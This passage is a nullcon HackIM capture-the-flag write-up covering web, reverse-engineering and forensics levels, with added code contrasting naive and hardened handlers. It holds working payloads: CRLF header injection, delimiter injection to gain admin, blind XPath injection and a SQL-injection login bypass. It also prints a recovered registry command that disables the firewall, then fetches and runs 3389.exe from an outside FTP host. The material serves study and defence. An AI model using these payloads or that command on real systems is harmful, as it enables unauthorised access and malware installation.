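  raise ArgumentError, "unknown page" unless ALLOWED_PAGES.include?(page)
  "HTTP/1.1 302 Found\r\nLocation: /#{page}\r\nContent-Length: 0\r\n\r\n"
end

# The writeup's page parameter, URL-decoded.
PAYLOAD = URI.decode_www_form_component(
  "wlevel-2-proc.asp?page=index.asp%0d%0aContent-Length:%200%0d%0a%0d%0a" \
  "HTTP/1.1%20302%20OK%0d%0aLocation:%20hackim.null.co.in"
)

if __FILE__ == $PROGRAM_NAME
  puts "naive handler emits #{count_responses(naive_redirect(PAYLOAD))} responses"
  begin
    safe_redirect(PAYLOAD)
  rescue ArgumentError => e
    puts "hardened handler: #{e.message}"
  end
end
```

Most web frameworks now reject CR and LF in header values for exactly this reason; the allow-list is the part that still has to be written per application, because a redirect to an arbitrary but well-formed URL is a separate problem.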
Web Level 3: Login System
Clue:
<!--Debug Info: INSERT 'a99|a|a99|a@a99.com|admin:no|comment:new user' INTO USER DB FILE -->
Approach: During registration, the data is stored in the DB as the above query. To bypass, register a user with the email user@example.com|admin:yes
On Login using the above registered user, we get the following:
Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472
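A Ruby model of the flat-file user store the debug comment reveals, added here as an example (the level's back end is not shown, so this is not its code): the naive "|"-joined record the comment implies, the reader that trusts the first admin: field it finds, and a writer that refuses the delimiter, so that the email user@example.com|admin:yes no longer turns into an admin account. The field order and meaning are assumed from the comment.

```ruby
# Added example: delimiter injection in a pipe-separated user record, naive vs hardened.

# Naive writer, laid out like the debug comment:
#   INSERT 'a99|a|a99|a@a99.com|admin:no|comment:new user' INTO USER DB FILE
# Field meaning (assumed): username|password|name|email|admin flag|comment
def naive_record(username, password, name, email)
  [username, password, name, email, "admin:no", "comment:new user"].join("|")
end

# The reader, shared by both writers: split on "|" and take the first admin: field.
# An injected "|admin:yes" inside the email lands before the real admin:no field,
# so a first-match parse believes the attacker's copy.
def parse_record(line)
  parts = line.split("|")
  admin = parts.find { |p| p.start_with?("admin:") }
  { username: parts[0], email: parts[3], admin: admin == "admin:yes" }
end

# Hardened writer: refuse the delimiter and control characters in every
# user-supplied field and check the email shape before anything is serialized.
def safe_record(username, password, name, email)
  [username, password, name, email].each do |v|
    raise ArgumentError, "delimiter or control character in field" if v.match?(/[|\x00-\x1f]/)
  end
  raise ArgumentError, "invalid email" unless email.match?(/\A[^@\s]+@[^@\s]+\.[^@\s]+\z/)
  naive_record(username, password, name, email)
end

if __FILE__ == $PROGRAM_NAME
  injected = naive_record("a99", "a", "a99", "user@example.com|admin:yes")
  puts injected
  p parse_record(injected)
  begin
    safe_record("a99", "a", "a99", "user@example.com|admin:yes")
  rescue ArgumentError => e
    puts "hardened writer: #{e.message}"
  end
end
```

Escaping the delimiter on write would also work, but only if every reader of the file applies the matching unescape; rejecting it at the boundary keeps the record format simple and makes the injected registration fail loudly instead of silently.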
Web Level 4: Can You Get Me all the Data?
Approach: Looked like SQL injection at first, as http://www.nullcon.net/challenge/wlevel-4-data.asp?input='or''=' gave all the data. On IRC, someone mentioned that he had been told SQL injection is a waste of time for this level, so guessed this should be either XQuery or XPath injection.
Followed steps suggested in Blind XPath Injection paper by Amit Klein
input ='or(name(//president[1])="president")or'a'='b => true => “president” exists in namespace
input ='or(name(//president[1])="people")or'a'='b => false => “people” does not exist in namespace
input ='or(name(//president[1])="india")or'a'='b => true => “india” exists in namespace
input='or(name(//name[1])="name")or'a'='b => true => “name” exists in namespace
From above, crafted the following query:
'] | //president[''or''='
Other query that also worked:
'] | //india[''or''='
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
References:
1. http://hackbbs.org/article/book/wf/blind-xpath-injection.pdf
2. http://projects.webappsec.org/XPath-Injection
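The lookup the level appears to run, modelled with Ruby's stdlib REXML as an added example (the level's XML and query are not shown, so this is not its code): the input is spliced into an XPath string literal, a union injection of the same shape as the writeup's closes that literal and appends an always-true predicate, and an allow-list check on the input stops it. The document, the predicate template and the secret values are constructed; the injected predicate is written as '' or ''='' (with spaces) rather than the writeup's ''or''='' because REXML's parser expects the operator to be space-separated.

```ruby
# Added example: XPath injection against a name lookup, vulnerable vs checked.
require "rexml/document"

# Constructed document standing in for the level's data file.
XML_DATA = <<~XML
  <data>
    <president><name>adams</name><secret>alpha</secret></president>
    <president><name>monroe</name><secret>bravo</secret></president>
    <india><name>nehru</name><secret>charlie</secret></india>
  </data>
XML

# Vulnerable lookup: the input becomes part of the XPath predicate.
def lookup_naive(input)
  doc = REXML::Document.new(XML_DATA)
  REXML::XPath.match(doc, "//president[name='#{input}']").map { |e| e.elements["secret"].text }
end

# Checked lookup: the input has to be a plain lowercase name before it is used.
def lookup_checked(input)
  raise ArgumentError, "name may contain letters only" unless input.match?(/\A[a-z]{1,40}\z/)
  lookup_naive(input)
end

# Closes the literal, unions in a second path whose predicate is always true.
INJECTION = "']|//president['' or ''='"

if __FILE__ == $PROGRAM_NAME
  p lookup_naive("monroe")
  p lookup_naive(INJECTION)
  begin
    lookup_checked(INJECTION)
  rescue ArgumentError => e
    puts "checked lookup: #{e.message}"
  end
end
```

Where the XPath engine supports variable bindings, passing the name as a bound variable is the equivalent of a parameterised SQL query and is preferable to character filtering; the allow-list shown here is the portable fallback.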
Web Level 5: Do You Have What IT Takes to Break into the World's Most Secure Login System?
Approach: Certain SQL injections are checked for and blocked by the login system. Initially thought the flaw might be in the logging system, so tried spoofing the User-Agent without much success. Heard on IRC that this level is SQLi. Found that the system does not block /**/ comments. Also, the login password field is limited to 10 characters, but only client-side, which can be overcome with Inspect Element and Edit attribute in Google Chrome. Tried a lot of different SQLi; the one that finally succeeded is:
Username: 'UNION/**/SELECT/**/1,'admin','doesntmatter
Password: doesntmatter
Welcome! You are logged in as ADMIN!
Flag: 47c1b025fa18ea96c33fbb6718688c0f
Reverse Engineering Level 1: Basic Test
Binary URL: http://www.nullcon.net/challenge/data/justdoit.exe
Approach: From the resource section, we find that it is AutoHotkey software. When it is running, pressing Windows + R makes it type automatically into the Open field (I am using Vista). Opened Notepad, started justdoit.exe, pressed Windows + R and then quickly clicked on the open Notepad window. The keystrokes went into Notepad and the flag was typed.
Flag: We could talk all day about what AutoHotKey can do for an online poker player
Reverse Engineering Level 2: Ask nicely, it will give you what you want
Binary URL: http://www.nullcon.net/challenge/data/HackIM.exe
Hint: Look for other paths.
Approach: Tried a lot of things with OllyDBG, including changing the entry point with Set Origin in Olly, without any luck.
The code may be in the .rsrc segment, which is not executable.
Opened the PE file using Stud_PE (http://www.cgsoftlabs.ro/studpe.html).
Changed the entry point to 0xC000, set the permissions of the .rsrc segment to Read, Write and Execute, and ran HackIM.exe.
Flag: AreYouHappyNow?
Reverse Engineering Level 3: null Mobile Android App
URL: http://www.nullcon.net/challenge/data/Null%20Mobile.apk
Approach: Extracted the APK by renaming it to NullMobile.apk.zip and opening it with WinRAR.
Found code.js and junk.php containing obfuscated JavaScript in res/raw:
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a
)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('6 $(){5 a=n H();u(5
i=0;i<q.r;i++){5 b=q[i];2(I b=='J')b=8.K(b);2(q.r==1)7 b;a.L(b)}7 a}6
o(a,b){a=a.v();2(8.h){u(5 i=0;i<8.h.r;i++){5 c=8.h[i];5 d=0;5
e=j;s{2(c.t){e=c.t[d]}k{e=c.M[d]}2(e){2(e.N.v()==a){2(b=='w'){2(c.t){c.O(
d)}k{c.P(d)}7 p}k{7 e}}}d++}Q(e)}}7 j}6 R(a){7 o(a,'w')}6
S(a){2(8.h){2(!o(a)){2(8.h[0].y){8.h[0].y(a,l,0)}k{8.h[0].T(a+' {
}',0)}}}7 o(a)}6 U(a,b){V="W X Y z A Z s 10 11 z A 12 s."}6 13(d,e){5
f=m;m.9=j;m.B=6(){2(f.9){f.9=j;f.3.B();f.3=l}}m.14=6(a,b){2(f.9){7
j}f.3=l;2(15.C){f.3=n C()}k{f.3=n 16("17.18")}2(f.3==l){7
j}k{f.3.19=6(){2(f.3.1a==4){f.9=j;f.D(f.3.1b,f.3.1c,f.3.1d);f.3=l}}f.9=n
1e();2(/1f/i.1g(b)){5 c=g+'?'+f.9.E();f.3.F("1h",c,p);f.3.1i("1j-
1k","1l/x-1m-1n-1o");f.3.G(a)}k{5
c=g+'?'+a+'&1p='+(f.9.E());f.3.F("1q",c,p);f.3.G(l)}7 p}}5
g=d;m.D=e||6(){}}',62,89,'||if|AJAX||var|function|return|document|updating|
|||||||styleSheets||false|else|null|this|new|getCSSRule|true|arguments|leng
th|do|cssRules|for|toLowerCase|delete||addRule|what|you|abort|XMLHttpReques
t|callback|getTime|open|send|Array|typeof|string|getElementById|push|rules|
selectorText|deleteRule|removeRule|while|killCSSRule|addCSSRule|insertRule|
mikcah|galf|Do|not|let|cannot|interfere|with|can|ajaxObject|update|window|A
ctiveXObject|Microsoft|XMLHTTP|onreadystatechange|readyState|responseText|s
tatus|responseXML|Date|post|test|POST|setRequestHeader|Content|type|applica
tion|www|form|urlencoded|timestamp|GET'.split('|'),0,{}))
Beautify using: http://jsbeautifier.org/
The flag is within the deobfuscated JavaScript code.
…
function mikcah(a, b) {
galf = "Do not let what you cannot do interfere with what you can do."
}
…
Flag: Do not let what you cannot do interfere with what you can do.
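The eval(function(p,a,c,k,e,r){...}) wrapper above is the well-known JavaScript packer, and its unpack step can be reimplemented so the string table is applied without running the script. The following is an added example in Ruby (not the writeup's code, and not the packer itself): tokens in the packed body are base-62 numbers (digits 0-9, a-z, then A-Z) that index the '|'-separated word list; the word list is the one quoted in the payload above, and the two packed fragments are functions from the same payload.

```ruby
# Added example: unpack the p,a,c,k,e,r JavaScript packer's token substitution in Ruby.

# Encode an index the way the packer's e() function does (base 62 for this payload).
def packer_token(index, base)
  prefix = index < base ? "" : packer_token(index / base, base)
  digit = index % base
  prefix + (digit > 35 ? (digit + 29).chr : digit.to_s(36))
end

# Replace every token (whole-word match, highest index first, as the packer does)
# with its dictionary word. Empty dictionary slots mean the token stands for itself.
def packer_unpack(packed, base, words)
  out = packed.dup
  (words.size - 1).downto(0) do |i|
    next if words[i].nil? || words[i].empty?
    token = Regexp.escape(packer_token(i, base))
    out = out.gsub(/\b#{token}\b/, words[i])
  end
  out
end

# The word list from the payload quoted in the writeup (89 entries, base 62).
PACKER_WORDS = ("||if|AJAX||var|function|return|document|updating||||||||styleSheets||false|" \
  "else|null|this|new|getCSSRule|true|arguments|length|do|cssRules|for|toLowerCase|" \
  "delete||addRule|what|you|abort|XMLHttpRequest|callback|getTime|open|send|Array|typeof|" \
  "string|getElementById|push|rules|selectorText|deleteRule|removeRule|while|killCSSRule|" \
  "addCSSRule|insertRule|mikcah|galf|Do|not|let|cannot|interfere|with|can|ajaxObject|" \
  "update|window|ActiveXObject|Microsoft|XMLHTTP|onreadystatechange|readyState|responseText|" \
  "status|responseXML|Date|post|test|POST|setRequestHeader|Content|type|application|www|" \
  "form|urlencoded|timestamp|GET").split("|", -1).freeze

# Two packed functions taken from the same payload.
PACKED_FRAGMENTS = [
  "6 R(a){7 o(a,'w')}",
  '6 U(a,b){V="W X Y z A Z s 10 11 z A 12 s."}'
].freeze

def unpacked_fragments
  PACKED_FRAGMENTS.map { |p| packer_unpack(p, 62, PACKER_WORDS) }
end

if __FILE__ == $PROGRAM_NAME
  puts unpacked_fragments
end
```

The descending order matters: multi-character tokens such as "10" must be replaced before "1" and "0", and the word-boundary match is what keeps a replacement like "killCSSRule" from being re-tokenised by later single-letter substitutions.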
Reverse Engineering 4
Binary URL: http://www.nullcon.net/challenge/data/script2
Tools: objdump, vi, gdb, strings, ps, cat
Steps:
Disassemble using Objdump (objdump -d ./script2)
Locate call to time
400ff3: bf 00 00 00 00 mov $0x0,%edi
400ff8: e8 43 f9 ff ff callq 400940 <time@plt>
400ffd: 48 39 c3 cmp %rax,%rbx
401000: 7d 0a jge 40100c
Change the above jge to jl (i.e. change 7d 0a to 7c 0a) at offset 0x00001000 using vi in hex editor mode (open the binary file in vi, type :%!xxd to convert to the hex view, modify the byte, type :%!xxd -r to convert back to binary, then save and exit with :wq)
Run ./script2 and press CTRL+Z to put to background
find process using ps
see /proc/<pid>/cmdline
Found the following being executed:
#!/bin/sh
##########################################################################
# Title : icat - "intelligent" cat
# Author : Heiner Steven <heiner.steven@odn.de>
# Date : 1994-05-18
# Requires : gzip, zcat
# Category : File Utilities
# SCCS-Id. : @(#) icat 1.3 08/01/31
##########################################################################
# Description
#
##########################################################################
PN=`basename "$0"` # program name
VER='1.3'
Extensions=".Z .z .gz .cpz .tgz" # known file extensions
usage () {
echo >&2 "$PN - cat file, uncompress if necessary, $VER (stv '95)
usage: $PN -l
$PN [file ...]
The first case lists all known extensions, the other case tries
to print the given file, uncompressing it if necessary."
exit 1
}
msg () {
for line
do echo "$PN: $line" >&2
done
}
fatal () { msg "$@"; exit 1; }
while [ $# -gt 0 ]
do
case "$1" in
-l) # List known suffixes
echo $Extensions
exit 0;;
--) shift; break;; # Simulate getopt
-h) usage;;
*) break;;
esac
done
if [ $# -lt 1 ]
then # read from stdin (uncompressed)
cat
else
flagreq=0
if [ $flagreq -eq 1 ]
then
echo "Nature has neither kernel nor shell; she is everything at once"
fi
for file
do
if [ -r "$file" ] # file does exist
then
# Try to determine decompressor based on the extension
case "$file" in
*.Z) zcat "$file";;
*.z) gzip -d -c "$file";;
*.gz|*.tgz) gzip -d -c "$file";;
*.bz2) bzip2 -d -c "$file";;
*.cpz) zcat < "$file";;
*) cat "$file";;
esac
else
# File does not exist: try to determine compressed version
if [ -r "$file".bz2 ]
then
bzip2 -d -c "$file"
elif [ -r "$file".gz ]
then
gzip -d -c "$file"
elif [ -r "$file".tgz ]
then
gzip -d -c "$file"
elif [ -r "$file".Z ]
then
zcat "$file"
elif [ -r "$file".z ]
then
gzip -d -c "$file"
elif [ -r "$file".cpz ]
then
zcat < "$file"
else
fatal "could not find file: $file"
fi
Err=$?
fi
done
fi
Alternate way:
1. Set the core dump size limit to unlimited (ulimit -c unlimited), send SIGSEGV to the program and force it to dump core. You can then find the script by running strings on the core.
2. Hook the call to time using the LD_PRELOAD technique.
Flag: Nature has neither kernel nor shell; she is everything at once
Reverse Engineering Level 5: Got Dumped :(
URL: http://www.nullcon.net/challenge/data/lol.rar
Tools Used: WinDBG, OllyDBG, metasm, vi
Steps:
The file is a crash dump. Opened the file in WinDBG and ran analyze -v. The program crashed in
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [D:\Users\Nilanjan\Documents\Docs\nullcon\lol.dmp]
User Mini Dump File with Full Memory: Only application data is
available
Symbol search path is: srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
Machine Name:
Debug session time: Sun Jan 8 14:38:14.000 2012 (GMT+5)
System Uptime: 0 days 0:57:47.904
Process Uptime: 0 days 0:00:21.000
.....
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(a60.73c): Access violation - code c0000005 (first/second chance not
available)
eax=0000978f ebx=00000001 ecx=a1840000 edx=82839b00 esi=00000000
edi=fffffffe
eip=deadbabe esp=0012feec ebp=0012ff30 iopl=0 nv up ei ng nz
na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010286
deadbabe ??
0:000> lm
start end module name
00400000 0040e000 Stub (no symbols)
77f10000 77f59000 gdi32 (pdb symbols)
c:\symbols\gdi32.pdb\740F60A99F2A417E96C387400994588D2\gdi32.pdb
7c800000 7c8f6000 kernel32 (pdb symbols)
c:\symbols\kernel32.pdb\34560E80F5C54175B208848EF863C5BD2\kernel32.pdb
7c900000 7c9af000 ntdll (pdb symbols)
c:\symbols\ntdll.pdb\1751003260CA42598C0FB326585000ED2\ntdll.pdb
7e410000 7e4a1000 user32 (pdb symbols)
c:\symbols\user32.pdb\D18A41B74E7F458CAAAC1847E2D8BF022\user32.pdb
Wrote memory to file as mapped PE binary file.
0:000> .writemem Stub.bin 00400000 0040dfff
Writing e000 bytes............................
Converted to proper PE file using metasm
#No | Name   | VSize    | VOffset  | RSize    | ROffset  | Charact.
#01 | .text  | 00006254 | 00001000 | 00006400 | 00000400 | 60000020
#02 | .rdata | 00001B42 | 00008000 | 00001C00 | 00006800 | 40000040
#03 | .data  | 000018DC | 0000A000 | 00000E00 | 00008400 | C0000040
#04 | .rsrc  | 000001B4 | 0000C000 | 00000200 | 00009200 | 40000040
#05 | .reloc | 00000C4E | 0000D000 | 00000E00 | 00009400 | 42000040
require './metasm/metasm'
# Read the raw memory image written out by WinDBG
data = File.open("Stub.bin", "rb") { |fd| fd.read(fd.stat.size) }
pe = Metasm::LoadedPE.load(data)
pe.cpu = Metasm::Ia32.new
pe.encode_file('Stub.exe', 'exe')
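Decoding the section table above, as an added example (not the writeup's code): it parses the metasm listing, expands the Characteristics column into the documented IMAGE_SCN_* flag bits, and answers the question that also sits behind Reverse Engineering Level 2, namely which section an RVA such as the entry point lands in and whether that section is mapped executable (the Level 2 binary's own header is not on the page, so this table stands in for it as a model). The table text is the one printed above; the flag values are the PE specification's.

```ruby
# Added example: PE section table parsing and executable-RVA check.

# IMAGE_SCN_* characteristic bits from the PE/COFF specification.
SECTION_FLAGS = {
  0x00000020 => :code,
  0x00000040 => :initialized_data,
  0x00000080 => :uninitialized_data,
  0x02000000 => :discardable,
  0x20000000 => :execute,
  0x40000000 => :read,
  0x80000000 => :write,
}.freeze

# The metasm section listing quoted in the writeup.
SECTION_TABLE = <<~TXT
  #No | Name   | VSize    | VOffset  | RSize    | ROffset  | Charact.
  #01 | .text  | 00006254 | 00001000 | 00006400 | 00000400 | 60000020
  #02 | .rdata | 00001B42 | 00008000 | 00001C00 | 00006800 | 40000040
  #03 | .data  | 000018DC | 0000A000 | 00000E00 | 00008400 | C0000040
  #04 | .rsrc  | 000001B4 | 0000C000 | 00000200 | 00009200 | 40000040
  #05 | .reloc | 00000C4E | 0000D000 | 00000E00 | 00009400 | 42000040
TXT

# Parse the "#NN | name | ... | flags" rows into hashes with integer fields;
# the header row is skipped because its first column is not a number.
def parse_section_table(text)
  text.lines.map do |line|
    cols = line.split("|").map(&:strip)
    next unless cols.size == 7 && cols[0].match?(/\A#\d+\z/)
    { name: cols[1], vsize: cols[2].hex, voffset: cols[3].hex,
      rsize: cols[4].hex, roffset: cols[5].hex, flags: cols[6].hex }
  end.compact
end

# Names of the flag bits set in a Characteristics value.
def describe_flags(value)
  SECTION_FLAGS.select { |bit, _| value & bit != 0 }.values
end

# Section whose virtual range covers the RVA, or nil for a gap or the headers.
def section_for_rva(sections, rva)
  sections.find { |s| rva >= s[:voffset] && rva < s[:voffset] + s[:vsize] }
end

# Would the loader let execution proceed at this RVA without a permission change?
def executable_rva?(sections, rva)
  sec = section_for_rva(sections, rva)
  !sec.nil? && describe_flags(sec[:flags]).include?(:execute)
end

if __FILE__ == $PROGRAM_NAME
  sections = parse_section_table(SECTION_TABLE)
  sections.each { |s| puts "#{s[:name].ljust(7)} #{describe_flags(s[:flags]).join(',')}" }
  [0x1000, 0xC000].each do |rva|
    puts "RVA %#x -> %s, executable: %s" % [rva, section_for_rva(sections, rva)[:name], executable_rva?(sections, rva)]
  end
end
```

An entry point at 0xC000 falls in .rsrc, which carries only INITIALIZED_DATA and READ; that is the reason Level 2 needed the section permissions changed before moving the entry point there, and a section mapped read-only that code nevertheless jumps into is a reliable thing to flag when auditing a binary.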
Tried debugging using OllyDBG. Code has anti-debugger checks because of which most paths did not
work. Tried changing entry points but none worked. Located call to MessageBox. Manually checked
where it gets called from. WinDBG analysis showed that the program has crashed while trying to
execute code @0xdeadbabe. Found code push 0xdeadbabe followed by retn which is an indirect
way of calling 0xdeadbabe.
0040106C 68 BEBAADDE PUSH DEADBABE
00401071 . C3 RETN
Changed the address to just before the MessageBox call code.
0040106C . 68 DA104000 PUSH stub3.004010DA
00401071 . C3 RETN ; RET used as a jump to 004010DA
Open the program using Ollydbg. Select and set the following as new origin:
00401000 $ 55 PUSH EBP
Run code
Flag: TheLastSamurai
Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
While conducting the raid on a suspect the police found the system containing no suspicious
information in the form of a code. While comparing various files they came up with a suspicious
sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.
Evidence URL: http://www.nullcon.net/challenge/data/JS.rar
Tools used: audacity
Approach: Open the file with Audacity and analyse it.
At some offsets the channel data differ. Extract only the portions where there is hidden audio in the right channel.
Playing it sounds like numbers in a foreign language.
If we apply the Reverse effect, mute the left channel and play, we can hear English numbers.
Flag: 12344346765
Forensics Level 2: Andar Ch0r
A company, Mil Baat Ke Khao Ltd, suspects that one of its employees is secretly sending the internal codes outside the organisation. The company sniffed the data being sent and reconstructed it to find that a Word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with a copy of that file and are required to find out the hidden code. The code is a whole number.
Evidence URL: http://www.nullcon.net/challenge/data/Passport_Number.doc
Running strings on the file shows that it contains hidden worksheets. Renamed it to Password.xls and the file opened properly in Excel.
Unhid the hidden sheets; the Nullcon2 sheet became visible.
Open the VB editor, select Sheet3 (Nullcon3) and press F4 to view its properties. Change the Visible property of the Nullcon3 sheet from 2 (xlSheetVeryHidden) to -1 (xlSheetVisible).
Here is your Passport number to the new level: 6924289
Flag: 6924289
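A way to list every sheet together with its visibility state without opening Excel, as an added example that is not from the write-up: it walks the BIFF8 BOUNDSHEET records of the workbook globals substream, where the hsState byte distinguishes visible, hidden and very hidden sheets. It assumes the Workbook stream has already been pulled out of the OLE2 container (for instance with the olefile module, which is not part of the page); the stream here is constructed in memory.

```python
import struct

BOF, BOUNDSHEET, EOF = 0x0809, 0x0085, 0x000A
# hsState byte of a BoundSheet8 record; 2 is what the VBA editor shows as xlSheetVeryHidden.
STATES = {0: "visible", 1: "hidden", 2: "veryHidden"}


def biff_records(stream):
    """Walk (type, payload) records of the workbook globals substream up to its EOF."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        yield rtype, stream[pos + 4:pos + 4 + rlen]
        pos += 4 + rlen
        if rtype == EOF:
            break


def sheet_states(stream):
    """[(sheet name, visibility)] from the BOUNDSHEET records, in workbook order."""
    sheets = []
    for rtype, payload in biff_records(stream):
        if rtype != BOUNDSHEET:
            continue
        _lbplypos, hs_state, _dt, cch, flags = struct.unpack_from("<IBBBB", payload, 0)
        if flags & 1:                                   # fHighByte set: UTF-16LE name
            name = payload[8:8 + 2 * cch].decode("utf-16-le")
        else:                                           # compressed 8-bit name
            name = payload[8:8 + cch].decode("latin-1")
        sheets.append((name, STATES.get(hs_state, "unknown(%d)" % hs_state)))
    return sheets


def very_hidden_sheets(stream):
    """Sheets a user cannot reveal from Excel's Unhide dialog; these deserve a look."""
    return [name for name, state in sheet_states(stream) if state == "veryHidden"]


def boundsheet(name, hs_state, wide=False):
    """Constructed BOUNDSHEET record (lbPlyPos left 0) for the sample stream below."""
    rgb = name.encode("utf-16-le") if wide else name.encode("latin-1")
    body = struct.pack("<IBBBB", 0, hs_state, 0, len(name), 1 if wide else 0) + rgb
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


def build_sample_stream():
    """Constructed BIFF8 globals substream: BOF, three sheets, EOF (no cell data)."""
    bof = struct.pack("<HH", BOF, 16) + bytes(16)
    return (bof + boundsheet("Nullcon1", 0, wide=True) + boundsheet("Nullcon2", 1)
            + boundsheet("Nullcon3", 2) + struct.pack("<HH", EOF, 0))
```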
Forensics Level 3: Not Guilty!
An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft Word and Excel.
While conducting the analysis nothing was found in the registry suggesting that something had run automatically. All locations that can run programs automatically were examined and nothing malicious was found.
You as an investigator are provided with a piece of hive to carve out whether anything was deleted from the hive, and to provide the exact "Value", "value type" and "data" deleted so that the employee gets justice.
Approach: Tried RegRipper and yaru; reglookup-recover (http://projects.sentinelchicken.org/reglookup/) worked.
$>reglookup-recover.exe software
OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,
SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,Text in Unallocated segment
hidden registry key
Flag: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
References: http://www.digitalforensicssolutions.com/papers/recovering-and-analyzing-deleted-registry-hives.pdf
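Triage of reglookup-recover output can be automated, as in this added example (not from the write-up): it splits the CSV rows from the ERROR lines the tool emits, then flags any recovered Winlogon logon-control value (Shell, Userinit) whose data is not the stock Windows XP data, reporting value name, type and data as the challenge asks. The sample output is constructed in the shape of the listing above, with the recovered command shortened.

```python
import csv

# Values under Winlogon that decide what runs at logon, with their stock XP data.
EXPECTED = {"Shell": "explorer.exe", "Userinit": "c:\\windows\\system32\\userinit.exe,"}

# Constructed excerpt in the shape of reglookup-recover CSV output (second row benign).
SAMPLE = r"""OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&ftp -s:cmd.txt&3389.exe&del cmd.txt /q,490,,,,,Text in Unallocated segment
00B4EF10,00000018,VALUE,,Shell,,,SZ,explorer.exe,26,,,,,Text in Unallocated segment
"""


def parse_recover_output(text):
    """Return (rows, errors): CSV rows as dicts keyed by the header, ERROR lines kept apart."""
    lines = text.splitlines()
    header = lines[0].split(",")
    rows, errors = [], []
    for line in lines[1:]:
        if not line.strip():
            continue
        if line.startswith("ERROR:"):
            errors.append(line)
            continue
        fields = next(csv.reader([line]))
        rows.append(dict(zip(header, fields)))
    return rows, errors


def suspicious_logon_values(rows):
    """Recovered VALUE cells naming a logon-control value whose data is not the stock data."""
    hits = []
    for r in rows:
        if r.get("REC_TYPE") != "VALUE" or r.get("NAME") not in EXPECTED:
            continue
        data = r.get("VK_VALUE", "")
        if data.strip().lower() != EXPECTED[r["NAME"]].lower():
            hits.append({"value": r["NAME"], "type": r["VK_TYPE"], "data": data,
                         "offset": r["OFFSET"], "source": r.get("RAW_CELL", "")})
    return hits
```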
Forensics Level 4: Intriguing MBR
A suspected drive was found in bad shape. Data extraction was almost impossible and the final copy obtained carried only a few bytes. The bytes belonged to the initial sectors, and wherever the system could not read, the space was filled with 0x00 so as to keep the offsets of the data obtained intact.
The initial sector displayed messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions on the damaged drive
2) The start and end LBA of each partition
3) The start and end of the unpartitioned space between two clusters
The drive showed to be a SATA drive with 512-byte LBAs.
Tools Used: mmls (Sleuthkit), vi
Approach:
Run mmls on image.
[nullc0n]$ mmls -t gpt ./image.dd
Invalid magic value (GPT Header: 5452000020494600)
Fix the header magic value (EFI PART) and the number of partitions using vi in binary mode (:%!xxd), then run mmls again (see references).
[nullc0n]$ mmls -t gpt ./image3.dd
Invalid sector address (gpt_load_table: Starting sector too large for image)
Download the Sleuthkit source, comment out the section where mmls throws the error and exits, then compile and run.
Patch:
[nullc0n]$ diff -pu sleuthkit-3.2.3/tsk3/vs/gpt.c*
--- sleuthkit-3.2.3/tsk3/vs/gpt.c 2012-01-15 18:32:13.302732773 +0530
+++ sleuthkit-3.2.3/tsk3/vs/gpt.c.orig 2012-01-20 16:43:37.251203455 +0530
@@ -212,7 +212,7 @@ gpt_load_table(TSK_VS_INFO * vs)
}
// make sure the first couple are in the image bounds
- /*if ((i < 2)
+ if ((i < 2)
&& (tsk_getu64(vs->endian, ent->start_lba) > max_addr)) {
tsk_error_reset();
tsk_errno = TSK_ERR_VS_BLK_NUM;
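Review bot: the diff was taken as `diff -pu gpt.c gpt.c.orig`, so the `-` lines here are the modified file and the `+` lines the pristine one; anyone feeding this to `patch` needs `-R` (or swapped file names) to reproduce the change. Wrapping `if ((i < 2) && (tsk_getu64(vs->endian, ent->start_lba) > max_addr))` in a block comment removes the guard that rejects a start LBA beyond the image, which is what a zero-padded truncated image needs, but it also silences the `TSK_ERR_VS_BLK_NUM` diagnostic for every other image; gating the check on an option would be safer than deleting it.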
@@ -221,7 +221,7 @@ gpt_load_table(TSK_VS_INFO * vs)
free(sect_buf);
free(ent_buf);
return 1;
- }*/
+ }
if ((name = tsk_malloc(256)) == NULL) {
